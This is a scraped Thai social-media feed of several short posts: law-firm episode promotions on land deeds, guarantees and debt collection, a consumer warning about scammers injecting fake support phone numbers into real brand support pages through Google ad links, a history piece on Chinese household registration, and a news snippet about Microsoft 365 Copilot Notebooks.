    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.56 : โฉนดที่ดิน #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 520 มุมมอง 0 รีวิว
  • EP.55 : การค้ำประกัน: สิ่งที่คุณต้องรู้ก่อนตัดสินใจเซ็นสัญญา

    การค้ำประกัน คือสัญญาที่บุคคลหนึ่งเรียกว่า ผู้ค้ำประกัน ตกลงที่จะผูกพันตนต่อ เจ้าหนี้ เพื่อชำระหนี้แทน ลูกหนี้ ในกรณีที่ลูกหนี้ไม่สามารถชำระหนี้นั้นได้ตามที่ตกลงกันไว้
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.55 : การค้ำประกัน: สิ่งที่คุณต้องรู้ก่อนตัดสินใจเซ็นสัญญา การค้ำประกัน คือสัญญาที่บุคคลหนึ่งเรียกว่า ผู้ค้ำประกัน ตกลงที่จะผูกพันตนต่อ เจ้าหนี้ เพื่อชำระหนี้แทน ลูกหนี้ ในกรณีที่ลูกหนี้ไม่สามารถชำระหนี้นั้นได้ตามที่ตกลงกันไว้ #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 522 มุมมอง 0 รีวิว
  • EP.54 : ประเภทของที่ดินที่คุณควรรู้ก่อนซื้อขาย
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.54 : ประเภทของที่ดินที่คุณควรรู้ก่อนซื้อขาย #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 485 มุมมอง 0 รีวิว
  • EP.53 : เงื่อนไขและอัตราเงินทดแทนใหม่
    สำหรับผู้ประกันตนมาตรา 33 ที่ถูกเลิกจ้าง
    ตั้งแต่วันที่ 28 มิถุนายน 2568 เป็นต้นไป
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.53 : เงื่อนไขและอัตราเงินทดแทนใหม่ สำหรับผู้ประกันตนมาตรา 33 ที่ถูกเลิกจ้าง ตั้งแต่วันที่ 28 มิถุนายน 2568 เป็นต้นไป #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 469 มุมมอง 0 รีวิว
  • EP.52 : แนวทางที่เจ้าหนี้ควรปฎิบัติ
    เมื่อลูกหนี้ไม่ชำระหนี้
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.52 : แนวทางที่เจ้าหนี้ควรปฎิบัติ เมื่อลูกหนี้ไม่ชำระหนี้ #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 492 มุมมอง 0 รีวิว
  • EP.51 : เจ้าหนี้ข่มขู่ทำร้ายร่างกาย
    ถ้าลูกหนี้ไม่จ่ายหนี้
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.51 : เจ้าหนี้ข่มขู่ทำร้ายร่างกาย ถ้าลูกหนี้ไม่จ่ายหนี้ #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 534 มุมมอง 0 รีวิว
  • ปกติเวลาเรามีปัญหาใช้บริการ Netflix, Apple, Microsoft หรือธนาคารต่าง ๆ ก็จะเข้า Google แล้วพิมพ์ “เบอร์ฝ่ายซัพพอร์ต” ใช่ไหมครับ? แต่ตอนนี้แฮกเกอร์รู้ทันคนแล้ว!

    Malwarebytes ออกมาเตือนว่า มิจฉาชีพซื้อโฆษณาบน Google แล้วใส่พารามิเตอร์พิเศษลงในลิงก์ ที่พาไปยังหน้าเว็บซัพพอร์ตจริงของแบรนด์ แต่จะฝัง เบอร์โทรปลอมไว้ในช่องค้นหาด้านบนของหน้าเว็บนั้น

    พูดง่าย ๆ คือ ลิงก์โฆษณาพาไปเว็บจริง แต่เนื้อหาเหมือน “ถูกฉีดข้อความ” ให้แสดงเบอร์หลอกไว้ตรงหน้า — ผู้ใช้ที่รีบโทร อาจโดนหลอกเอาข้อมูลบัญชี บัตรเครดิต หรือกู้เงินในชื่อเราได้ง่าย ๆ เลย

    เป้าหมายที่โดนบ่อยมีทั้ง Netflix, Apple, Facebook, PayPal, Microsoft, HP, Bank of America ฯลฯ โดยเฉพาะเว็บ Apple ที่แทบตรวจจับไม่ได้ว่ามีอะไรแอบแฝง

    แฮกเกอร์ฝังเบอร์หลอกในหน้าเว็บซัพพอร์ตจริง โดยใช้ลิงก์โฆษณา Google Ads  
    • ใช้ query string ปลอมให้ช่องค้นหาบนหน้าเว็บแสดงเบอร์โทรหลอก

    เว็บแบรนด์ดังที่ตกเป็นเป้า ได้แก่:  
    • Apple, Netflix, PayPal, Microsoft, Facebook, Bank of America, HP

    ผู้ใช้เข้าเว็บจริงแต่เห็นเบอร์ปลอม คิดว่าเป็นของบริษัท และโทรหาแก๊งหลอกลวงโดยไม่รู้ตัว  
    • มิจฉาชีพจะพยายามล้วงข้อมูลส่วนตัว เช่น ข้อมูลบัญชีธนาคาร, login credentials

    Malwarebytes ระบุว่า “Browser Guard” สามารถตรวจจับกลโกงลักษณะนี้ได้ในบางกรณี  
    • ช่วยแจ้งเตือนเมื่อหน้าเว็บมีพารามิเตอร์หรือข้อความแฝงผิดปกติ

    ตัวอย่างลักษณะ URL และพฤติกรรมที่ควรระวัง:  
    • มีเบอร์โทรต่อท้าย URL ของหน้าเว็บ  
    • มีคำเตือนรุนแรงผิดปกติ เช่น “Call now to avoid account lock”  
    • มีอักขระพิเศษใน URL เช่น %20 หรือพารามิเตอร์ยาวผิดปกติ  
    • หน้า search ของเว็บแสดงผลทันทีแม้ยังไม่ได้พิมพ์

    อย่าโทรเบอร์ใด ๆ ที่พบจากโฆษณาหรือหน้าค้นหาโดยไม่ตรวจสอบก่อน  
    • ให้เช็กเบอร์จากช่องทางที่ยืนยันแล้ว เช่น อีเมลเก่า, แอปทางการ, โซเชียลทางการ หรือ Wikipedia

    อย่าเชื่อเว็บที่คลิกเข้าไปจาก Google โดยไม่ตรวจสอบ URL ให้แน่ชัด  
    • แม้จะดูเป็นเว็บจริง แต่พารามิเตอร์ในลิงก์อาจถูกฉีดข้อมูลเข้ามา

    ถ้าฝ่ายซัพพอร์ตถามข้อมูลการเงินที่ไม่เกี่ยวกับปัญหา อย่าตอบ — ควรวางสายทันที  
    • แบรนด์จริงไม่ควรขอรหัสผ่านหรือ OTP ผ่านการโทรปกติ

    หลีกเลี่ยงการกดลิงก์จากอีเมลหรือโฆษณาที่พยายามสร้างความเร่งรีบ  
    • อาทิ “บัญชีจะถูกลบถ้าไม่ยืนยันใน 24 ชั่วโมง”

    https://www.techspot.com/news/108384-scammers-hijack-real-support-pages-show-fake-phone.html
    ปกติเวลาเรามีปัญหาใช้บริการ Netflix, Apple, Microsoft หรือธนาคารต่าง ๆ ก็จะเข้า Google แล้วพิมพ์ “เบอร์ฝ่ายซัพพอร์ต” ใช่ไหมครับ? แต่ตอนนี้แฮกเกอร์รู้ทันคนแล้ว! Malwarebytes ออกมาเตือนว่า มิจฉาชีพซื้อโฆษณาบน Google แล้วใส่พารามิเตอร์พิเศษลงในลิงก์ ที่พาไปยังหน้าเว็บซัพพอร์ตจริงของแบรนด์ แต่จะฝัง เบอร์โทรปลอมไว้ในช่องค้นหาด้านบนของหน้าเว็บนั้น พูดง่าย ๆ คือ ลิงก์โฆษณาพาไปเว็บจริง แต่เนื้อหาเหมือน “ถูกฉีดข้อความ” ให้แสดงเบอร์หลอกไว้ตรงหน้า — ผู้ใช้ที่รีบโทร อาจโดนหลอกเอาข้อมูลบัญชี บัตรเครดิต หรือกู้เงินในชื่อเราได้ง่าย ๆ เลย เป้าหมายที่โดนบ่อยมีทั้ง Netflix, Apple, Facebook, PayPal, Microsoft, HP, Bank of America ฯลฯ โดยเฉพาะเว็บ Apple ที่แทบตรวจจับไม่ได้ว่ามีอะไรแอบแฝง ✅ แฮกเกอร์ฝังเบอร์หลอกในหน้าเว็บซัพพอร์ตจริง โดยใช้ลิงก์โฆษณา Google Ads   • ใช้ query string ปลอมให้ช่องค้นหาบนหน้าเว็บแสดงเบอร์โทรหลอก ✅ เว็บแบรนด์ดังที่ตกเป็นเป้า ได้แก่:   • Apple, Netflix, PayPal, Microsoft, Facebook, Bank of America, HP ✅ ผู้ใช้เข้าเว็บจริงแต่เห็นเบอร์ปลอม คิดว่าเป็นของบริษัท และโทรหาแก๊งหลอกลวงโดยไม่รู้ตัว   • มิจฉาชีพจะพยายามล้วงข้อมูลส่วนตัว เช่น ข้อมูลบัญชีธนาคาร, login credentials ✅ Malwarebytes ระบุว่า “Browser Guard” สามารถตรวจจับกลโกงลักษณะนี้ได้ในบางกรณี   • ช่วยแจ้งเตือนเมื่อหน้าเว็บมีพารามิเตอร์หรือข้อความแฝงผิดปกติ ✅ ตัวอย่างลักษณะ URL และพฤติกรรมที่ควรระวัง:   • มีเบอร์โทรต่อท้าย URL ของหน้าเว็บ   • มีคำเตือนรุนแรงผิดปกติ เช่น “Call now to avoid account lock”   • มีอักขระพิเศษใน URL เช่น %20 หรือพารามิเตอร์ยาวผิดปกติ   • หน้า search ของเว็บแสดงผลทันทีแม้ยังไม่ได้พิมพ์ ‼️ อย่าโทรเบอร์ใด ๆ ที่พบจากโฆษณาหรือหน้าค้นหาโดยไม่ตรวจสอบก่อน   • ให้เช็กเบอร์จากช่องทางที่ยืนยันแล้ว เช่น อีเมลเก่า, แอปทางการ, โซเชียลทางการ หรือ Wikipedia ‼️ อย่าเชื่อเว็บที่คลิกเข้าไปจาก Google โดยไม่ตรวจสอบ URL ให้แน่ชัด   • แม้จะดูเป็นเว็บจริง แต่พารามิเตอร์ในลิงก์อาจถูกฉีดข้อมูลเข้ามา ‼️ ถ้าฝ่ายซัพพอร์ตถามข้อมูลการเงินที่ไม่เกี่ยวกับปัญหา อย่าตอบ — ควรวางสายทันที   • แบรนด์จริงไม่ควรขอรหัสผ่านหรือ OTP ผ่านการโทรปกติ ‼️ หลีกเลี่ยงการกดลิงก์จากอีเมลหรือโฆษณาที่พยายามสร้างความเร่งรีบ   • อาทิ “บัญชีจะถูกลบถ้าไม่ยืนยันใน 24 ชั่วโมง” https://www.techspot.com/news/108384-scammers-hijack-real-support-pages-show-fake-phone.html
    WWW.TECHSPOT.COM
    Scammers hijack real support pages to show fake phone numbers
    Many people likely understand that they should verify URLs when visiting sites for banks, tech companies, and other critical services to avoid fraudulent links. While steering clear...
    0 ความคิดเห็น 0 การแบ่งปัน 487 มุมมอง 0 รีวิว
  • เพื่อนเพจที่ได้อ่านนิยาย/ดูละครเรื่อง <ฉางอันสิบสองชั่วยาม> คงจำได้ว่า เป็นเรื่องราวแนวสืบสวนที่พูดถึงการใช้ข้อมูลจากบันทึกและทะเบียนต่างๆ มาใช้ในการแกะรอยคนร้าย มีหลายประเด็นที่ทำให้ Storyฯ สงสัยเลยต้องไปหาข้อมูลมาเพิ่ม

    เรื่องที่จะเล่าวันนี้มีความ ‘เอ๊ะ’ ตรงไหน เรามาดูจากคำพูดข้างล่างจากในละครเรื่องนี้
    ... สวีปินกล่าว “จากบันทึกทะเบียนบ้านของคนผู้นี้ เขาย้ายมาฉางอันเมื่อปีที่ยี่สิบหกในรัชศกก่อน จดทะเบียนในนามหลงปอ ต่อมาย้ายบ้านหลายครา เมื่อปีที่แล้วย้ายเข้าหวยหย่วนฟาง ที่ดูน่าสงสัยคือ เมื่อปลายปีรัชศกเทียนเป่าปีที่สอง มีการจัดทำสมุดทะเบียนใหม่ กำหนดให้ใส่รายละเอียดใบหน้าให้ชัดเจน แต่ทะเบียนของหลงปอยังคงเป็นทะเบียนเก่าสมัยรัชศกก่อน ไม่เคยระบุรายละเอียดหน้าตา”...

    เพื่อนเพจสงสัยเหมือนกันไหมว่า ทะเบียนราษฎร์ในสมัยราชวงศ์ถัง (รัชศกเทียนเป่าคือช่วงปีค.ศ. 742-756) ถึงขนาดมีรายละเอียดใบหน้าชัดเจนเชียวหรือ?

    ไปค้นข้อมูลมาจึงพบว่า การนับจำนวนประชากรในจีนโบราณมีมาตั้งแต่กว่าสองพันปีก่อนคริสตกาล เดิมเป็นการจัดเก็บข้อมูลเพื่อไว้เพื่อช่วยเหลือคนในยามเกิดอุทกภัยน้ำท่วม ไม่ปรากฏข้อมูลเพิ่มเติมว่าเป็นเพียงการนับจำนวนประชากรหรือมีการบันทึกรายละเอียดมากกว่านั้น แต่ในสมัยราชวงศ์โจวตะวันออก (ปี 1045-771 ก่อนคริสตกาล) มีการจัดทำทะเบียนราษฎร์ทุกสามปี รายละเอียดที่บันทึกไว้รวมถึงวันเกิด วันตาย เพศ และที่อยู่ของประชาชน

    ในสมัยฉิน มีการจัดทำทะเบียนราษฎร์อย่างเข้มงวด นอกจากรายละเอียดข้างต้นยังมีการระบุเจ้าบ้าน ชื่อสามี-ภรรยา โดยวัตถุประสงค์หลักคือเพื่อใช้ในการเก็บภาษีและเกณฑ์ทหาร

    ต่อมาในยุคสมัยราชวงศ์ฮั่น (ปี 202 ก่อนคริสตกาล - ค.ศ. 221) ประชาชนมีหน้าที่รายงานข้อมูลและการเปลี่ยนแปลงของสมาชิกในครอบครัวทุกปี โดยข้อมูลจะถูกตรวจสอบโดยทางการท้องถิ่นอีกครั้งก่อนจะรวบรวมส่งทางการส่วนกลาง รายละเอียดที่บันทึกรวมถึงชื่อแซ่ อายุ ภูมิลำเนาเดิม สถานะสมรส รายละเอียดหน้าตา รายได้ และจำนวนพื้นที่ของที่ดินที่ถือครอง หากจะย้ายบ้าน ต้องทำการรายงานกับที่ว่าการท้องถิ่นก่อนจึงจะย้ายออกได้ ไม่เช่นนั้นจะกลายเป็นคนพเนจร ซึ่งไม่ได้รับการคุ้มครองทางกฎหมาย (คือโดนฆ่าตายก็ไม่มีการสืบสวนเอาผิดคนฆ่า) ว่ากันว่าทะเบียนราษฏร์สมัยราชวงศ์ฮั่นนี้ละเอียดถูกต้องเชื่อถือได้มากกว่าครั้งใดที่จีนเคยทำมาในอดีต

    การจัดทำทะเบียนราษฎร์มีต่อมาเรื่อยๆ และมีการลงรายละเอียดมากขึ้นในยุคสมัยราชวงศ์ถัง (ซึ่งเรื่องราวของ <ฉางอันสิบสองชั่วยาม> เกิดขึ้นในสมัยนี้) ในสมัยนั้น ทะเบียนราษฎร์คือการสรุปรวมข้อมูลของทะเบียนบ้านหรือที่เรียกว่า ‘โส่วสือ’ (手实) มีการจัดแยกหมวดหมู่ตามสถานะ กล่าวคือเป็นเจ้าบ้าน เป็นสมาชิกของตระกูล หรือเป็นผู้อยู่อาศัยในเรือนเช่นทาส บ่าว นักดนตรี ฯลฯ และมีการบันทึกรายละเอียดเพิ่มเติมของรูปพรรณสัณฐาน เช่นส่วนสูง สีผิว เป็นต้น โดยมีเพียงสมาชิกของตระกูลเท่านั้นที่จะมีสิทธิแยกออกมาจัดตั้งครัวเรือนใหม่ได้ (Storyฯ เพิ่งเข้าใจบริบทที่ว่าบางนิยายจีนโบราณกล่าวถึงการ ‘แยกบ้าน’ ของคนในตระกูลเดียวกันที่ฟังดูเป็นเรื่องราวใหญ่โต) สำหรับชาวไร่ชาวนา ข้อมูลจากโส่วสือยังถูกใช้ในการจัดสรรที่ดินทำกิน โดยอิงตามจำนวนสมาชิกในบ้าน

    ต่อมาในสมัยราชวงศ์หมิง มีการลงรายละเอียดเพิ่มเติมอีกคืออาชีพของคนในบ้าน เช่น นายช่าง ทหาร หรือข้าราชการ ฯลฯ และมีรายละเอียดรายรับและสินทรัพย์ของแต่ละคนเพิ่มเติม เช่นจำนวนที่ดิน บ้าน ร้านค้า รถม้า เรือ ฯลฯ ทะเบียนราษฎร์นี้เรียกว่า ‘หวงเช่อ’ (黄册) แปลตรงตัวว่าสมุดเหลือง เพราะมักใช้ปกสีเหลือง (โนว์... ไม่ใช่สมุดโทรศัพท์ Yellow Pages จ้า) อีกทั้งการนำข้อมูลจากทะเบียนราษฎร์มาใช้เพิ่มดีกรีความเข้มข้น ใครจะเดินทางต้องพกเอกสารใบอนุญาตที่มีข้อมูลประจำตัวและบ้าน (Storyฯ นึกถึงในละครที่จะผ่านประตูเมืองแต่ละครั้งต้องควักเอกสารออกมาฉบับหนึ่ง)

    Storyฯ รู้สึกทึ่งว่า แบบแผนการบริหารงานบ้านเมืองในโลกปัจจุบัน จริงๆ แล้วไม่ได้หนีจากของโบราณที่มีมาหลายพันปีแล้วเลย คนโบราณช่างคิดช่างทำ เก่งจริง เพื่อนๆ ว่าไหม?

    (ป.ล. หากอ่านแล้วชอบใจ ช่วยกดไลค์กดแชร์กันด้วยนะคะ #StoryfromStory)

    Credit รูปภาพจาก:
    https://luvasianseries.blogspot.com/2020/10/longest-day-in-changan.html
    https://daydaynews.cc/zh-hans/history/160001.html
    Credit ข้อมูลรวบรวมจาก:
    https://zhuanlan.zhihu.com/p/113664748
    http://www.naradafoundation.org/content/6526
    https://daydaynews.cc/zh-hans/history/160001.html

    #ฉางอันสิบสองชั่วยาม #ประวัติศาสตร์จีน #ทะเบียนราษฎร์จีน #ราชวงศ์ถัง
    เพื่อนเพจที่ได้อ่านนิยาย/ดูละครเรื่อง <ฉางอันสิบสองชั่วยาม> คงจำได้ว่า เป็นเรื่องราวแนวสืบสวนที่พูดถึงการใช้ข้อมูลจากบันทึกและทะเบียนต่างๆ มาใช้ในการแกะรอยคนร้าย มีหลายประเด็นที่ทำให้ Storyฯ สงสัยเลยต้องไปหาข้อมูลมาเพิ่ม เรื่องที่จะเล่าวันนี้มีความ ‘เอ๊ะ’ ตรงไหน เรามาดูจากคำพูดข้างล่างจากในละครเรื่องนี้ ... สวีปินกล่าว “จากบันทึกทะเบียนบ้านของคนผู้นี้ เขาย้ายมาฉางอันเมื่อปีที่ยี่สิบหกในรัชศกก่อน จดทะเบียนในนามหลงปอ ต่อมาย้ายบ้านหลายครา เมื่อปีที่แล้วย้ายเข้าหวยหย่วนฟาง ที่ดูน่าสงสัยคือ เมื่อปลายปีรัชศกเทียนเป่าปีที่สอง มีการจัดทำสมุดทะเบียนใหม่ กำหนดให้ใส่รายละเอียดใบหน้าให้ชัดเจน แต่ทะเบียนของหลงปอยังคงเป็นทะเบียนเก่าสมัยรัชศกก่อน ไม่เคยระบุรายละเอียดหน้าตา”... เพื่อนเพจสงสัยเหมือนกันไหมว่า ทะเบียนราษฎร์ในสมัยราชวงศ์ถัง (รัชศกเทียนเป่าคือช่วงปีค.ศ. 742-756) ถึงขนาดมีรายละเอียดใบหน้าชัดเจนเชียวหรือ? ไปค้นข้อมูลมาจึงพบว่า การนับจำนวนประชากรในจีนโบราณมีมาตั้งแต่กว่าสองพันปีก่อนคริสตกาล เดิมเป็นการจัดเก็บข้อมูลเพื่อไว้เพื่อช่วยเหลือคนในยามเกิดอุทกภัยน้ำท่วม ไม่ปรากฏข้อมูลเพิ่มเติมว่าเป็นเพียงการนับจำนวนประชากรหรือมีการบันทึกรายละเอียดมากกว่านั้น แต่ในสมัยราชวงศ์โจวตะวันออก (ปี 1045-771 ก่อนคริสตกาล) มีการจัดทำทะเบียนราษฎร์ทุกสามปี รายละเอียดที่บันทึกไว้รวมถึงวันเกิด วันตาย เพศ และที่อยู่ของประชาชน ในสมัยฉิน มีการจัดทำทะเบียนราษฎร์อย่างเข้มงวด นอกจากรายละเอียดข้างต้นยังมีการระบุเจ้าบ้าน ชื่อสามี-ภรรยา โดยวัตถุประสงค์หลักคือเพื่อใช้ในการเก็บภาษีและเกณฑ์ทหาร ต่อมาในยุคสมัยราชวงศ์ฮั่น (ปี 202 ก่อนคริสตกาล - ค.ศ. 221) ประชาชนมีหน้าที่รายงานข้อมูลและการเปลี่ยนแปลงของสมาชิกในครอบครัวทุกปี โดยข้อมูลจะถูกตรวจสอบโดยทางการท้องถิ่นอีกครั้งก่อนจะรวบรวมส่งทางการส่วนกลาง รายละเอียดที่บันทึกรวมถึงชื่อแซ่ อายุ ภูมิลำเนาเดิม สถานะสมรส รายละเอียดหน้าตา รายได้ และจำนวนพื้นที่ของที่ดินที่ถือครอง หากจะย้ายบ้าน ต้องทำการรายงานกับที่ว่าการท้องถิ่นก่อนจึงจะย้ายออกได้ ไม่เช่นนั้นจะกลายเป็นคนพเนจร ซึ่งไม่ได้รับการคุ้มครองทางกฎหมาย (คือโดนฆ่าตายก็ไม่มีการสืบสวนเอาผิดคนฆ่า) ว่ากันว่าทะเบียนราษฏร์สมัยราชวงศ์ฮั่นนี้ละเอียดถูกต้องเชื่อถือได้มากกว่าครั้งใดที่จีนเคยทำมาในอดีต การจัดทำทะเบียนราษฎร์มีต่อมาเรื่อยๆ และมีการลงรายละเอียดมากขึ้นในยุคสมัยราชวงศ์ถัง (ซึ่งเรื่องราวของ <ฉางอันสิบสองชั่วยาม> เกิดขึ้นในสมัยนี้) ในสมัยนั้น ทะเบียนราษฎร์คือการสรุปรวมข้อมูลของทะเบียนบ้านหรือที่เรียกว่า ‘โส่วสือ’ (手实) มีการจัดแยกหมวดหมู่ตามสถานะ กล่าวคือเป็นเจ้าบ้าน เป็นสมาชิกของตระกูล หรือเป็นผู้อยู่อาศัยในเรือนเช่นทาส บ่าว นักดนตรี ฯลฯ และมีการบันทึกรายละเอียดเพิ่มเติมของรูปพรรณสัณฐาน เช่นส่วนสูง สีผิว เป็นต้น โดยมีเพียงสมาชิกของตระกูลเท่านั้นที่จะมีสิทธิแยกออกมาจัดตั้งครัวเรือนใหม่ได้ (Storyฯ เพิ่งเข้าใจบริบทที่ว่าบางนิยายจีนโบราณกล่าวถึงการ ‘แยกบ้าน’ ของคนในตระกูลเดียวกันที่ฟังดูเป็นเรื่องราวใหญ่โต) สำหรับชาวไร่ชาวนา ข้อมูลจากโส่วสือยังถูกใช้ในการจัดสรรที่ดินทำกิน โดยอิงตามจำนวนสมาชิกในบ้าน ต่อมาในสมัยราชวงศ์หมิง มีการลงรายละเอียดเพิ่มเติมอีกคืออาชีพของคนในบ้าน เช่น นายช่าง ทหาร หรือข้าราชการ ฯลฯ และมีรายละเอียดรายรับและสินทรัพย์ของแต่ละคนเพิ่มเติม เช่นจำนวนที่ดิน บ้าน ร้านค้า รถม้า เรือ ฯลฯ ทะเบียนราษฎร์นี้เรียกว่า ‘หวงเช่อ’ (黄册) แปลตรงตัวว่าสมุดเหลือง เพราะมักใช้ปกสีเหลือง (โนว์... ไม่ใช่สมุดโทรศัพท์ Yellow Pages จ้า) อีกทั้งการนำข้อมูลจากทะเบียนราษฎร์มาใช้เพิ่มดีกรีความเข้มข้น ใครจะเดินทางต้องพกเอกสารใบอนุญาตที่มีข้อมูลประจำตัวและบ้าน (Storyฯ นึกถึงในละครที่จะผ่านประตูเมืองแต่ละครั้งต้องควักเอกสารออกมาฉบับหนึ่ง) Storyฯ รู้สึกทึ่งว่า แบบแผนการบริหารงานบ้านเมืองในโลกปัจจุบัน จริงๆ แล้วไม่ได้หนีจากของโบราณที่มีมาหลายพันปีแล้วเลย คนโบราณช่างคิดช่างทำ เก่งจริง เพื่อนๆ ว่าไหม? (ป.ล. หากอ่านแล้วชอบใจ ช่วยกดไลค์กดแชร์กันด้วยนะคะ #StoryfromStory) Credit รูปภาพจาก: https://luvasianseries.blogspot.com/2020/10/longest-day-in-changan.html https://daydaynews.cc/zh-hans/history/160001.html Credit ข้อมูลรวบรวมจาก: https://zhuanlan.zhihu.com/p/113664748 http://www.naradafoundation.org/content/6526 https://daydaynews.cc/zh-hans/history/160001.html #ฉางอันสิบสองชั่วยาม #ประวัติศาสตร์จีน #ทะเบียนราษฎร์จีน #ราชวงศ์ถัง
    1 ความคิดเห็น 0 การแบ่งปัน 945 มุมมอง 0 รีวิว
  • Microsoft ได้เปิดตัว Microsoft 365 Copilot Notebooks ซึ่งเป็นฟีเจอร์ใหม่ที่ช่วยให้ผู้ใช้สามารถรวบรวมข้อมูลจากแหล่งต่าง ๆ เช่น Copilot Chat, ไฟล์, โน้ต และลิงก์ ไว้ในที่เดียวกันเพื่อเพิ่มประสิทธิภาพในการทำงาน โดยฟีเจอร์นี้ถูกออกแบบมาเพื่อ ลูกค้าองค์กร ที่มี Microsoft 365 Copilot, SharePoint หรือ OneDrive licenses และสามารถใช้งานได้บน OneNote เวอร์ชัน 2504 (Build 18827.20128) หรือใหม่กว่า

    สรุปเนื้อหาข่าว
    Microsoft 365 Copilot Notebooks ถูกผนวกเข้ากับ OneNote บน Windows เพื่อช่วยให้ผู้ใช้สามารถรวบรวมข้อมูลและสร้างเนื้อหาที่มีประสิทธิภาพมากขึ้น
    ผู้ใช้สามารถสร้าง Copilot Notebook ได้โดยไปที่ Home > Create Copilot Notebook หรือ New notebook และสามารถเพิ่มเอกสารอ้างอิง เช่น OneNote pages, .docx, .pptx, .xlsx, .pdf หรือ .loop files เพื่อให้ Copilot มีบริบทในการให้คำตอบที่แม่นยำขึ้น
